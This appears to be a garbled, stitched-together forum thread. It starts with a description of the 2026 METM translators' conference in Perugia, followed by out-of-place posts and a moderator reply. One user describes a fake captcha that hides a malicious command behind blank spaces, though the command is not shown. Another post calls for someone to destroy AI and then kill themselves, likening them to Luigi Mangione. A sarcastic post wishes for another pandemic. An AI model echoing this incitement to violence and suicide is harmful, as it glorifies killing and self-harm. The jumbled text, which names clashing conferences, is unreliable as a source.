The annual Mediterranean Editors and Translators Meeting (METM) is an established CPD and networking event – a highlight in the calendar for many editors, translators, interpreters and other providers of English-language support services in the Mediterranean area and beyond. It offers one and a half days of presentations and keynote speeches, two half days of pre-conference workshops, and a programme of “off-METM” events.

The 2026 meeting will take place in Perugia, the capital of Umbria, known as the “green heart of Italy”. This medieval hilltop town with a rich Etruscan past is famous for its international festivals: Umbria Jazz, Eurochocolate and the International Journalism Festival. It’s also home to the famous Baci chocolates and some of Italy’s finest wines. Our venue, the Hotel Giò Wine & Jazz Area, located just outside the old town, is one of the main conference centres in central Italy.

Besides, all the lecturers were super nice, helpful and you could tell that they are passionated about their subjects. The strange command line the captcha wants us to run is the one between the quotes and with underline:

The space characters following "n" hide the strange code from the user.

If the user runs this code, Windows Defender pops up a Virus Alert and puts 4 virus in quarantine.

Well, I guess I won't try to prove my humanity to this website. Sorry.

I don't what this anachronistic claptrap had to offer (too long, didn't watch it), but it seems to me there is only one way to 'get found, seen and hired' today: Kill/Destroy AI.
We need that one ballsy individual who will selflessly lay down their life for the good of their fellow translators and take that ultimate action just like Raskolnikov did.
He/she will murder/destroy AI completely and then have to kill themselves as well, otherwise Elon Musk and his bullies will be all over them and give them a very slow and painful death.
Their sacrifice will be forever appreciated by the future generations, and they'll go down the history like Che Guevara or Luigi Mangione.
Until that saviour arrives, we're all lost, doomed.

While this thread is dedicated to the upcoming MedTranslate conference and we generally encourage discussions to stay on topic, in line with forum rule #4, I understand your concerns, so I've chosen to leave your post visible.

The team is actively working on stabilizing the site's performance, and our top priority is restoring the classic site to full functionality as soon as possible. I recognize how frustrating these issues can be, and the systems team is fully dedicated to resolving them. That said, we can't halt all work, and we need to continue supporting valuable industry initiatives like this conference.

You may already know that we are building a new version of the site, with some sections —such as training courses and ProZ*Pay— already available in the prototype. While progress has slowed due to our focus on stabilizing the classic site, ProZ remains committed to delivering this much-needed update in 2025. I'm not saying this couldn't be interesting, but it is somewhat cynical that most participants will be people with too much time on their hands (shortage of work), paying between 575 (early birds) and 850 (not so early birds) euros with money they probably won't have in abundance.

Covid-19 was indeed manna from heaven for the empowerment industry. It fast-tracked digitization, and achieved in one year what the so-called globalization managed to deliver in 20 odd years. While everybody was going broke, translators thrived! Never before did they get such abundant job opportunities and rate increases! It was just too bad that the vaxxers got their way and derailed the gravy train... Now the pandemic is over, localization industry is dead as a dodo.
We were really pinning our hopes on Monkey Pox, but the damn thing just didn't effing pick up!
As we say in our empowerment seminars over and over again: what the industry needs right now is another world-wide pandemic. Hopefully something will come along pretty soon and linguistic localization industry will start making big bucks like it did 4 years ago. We live in hope!
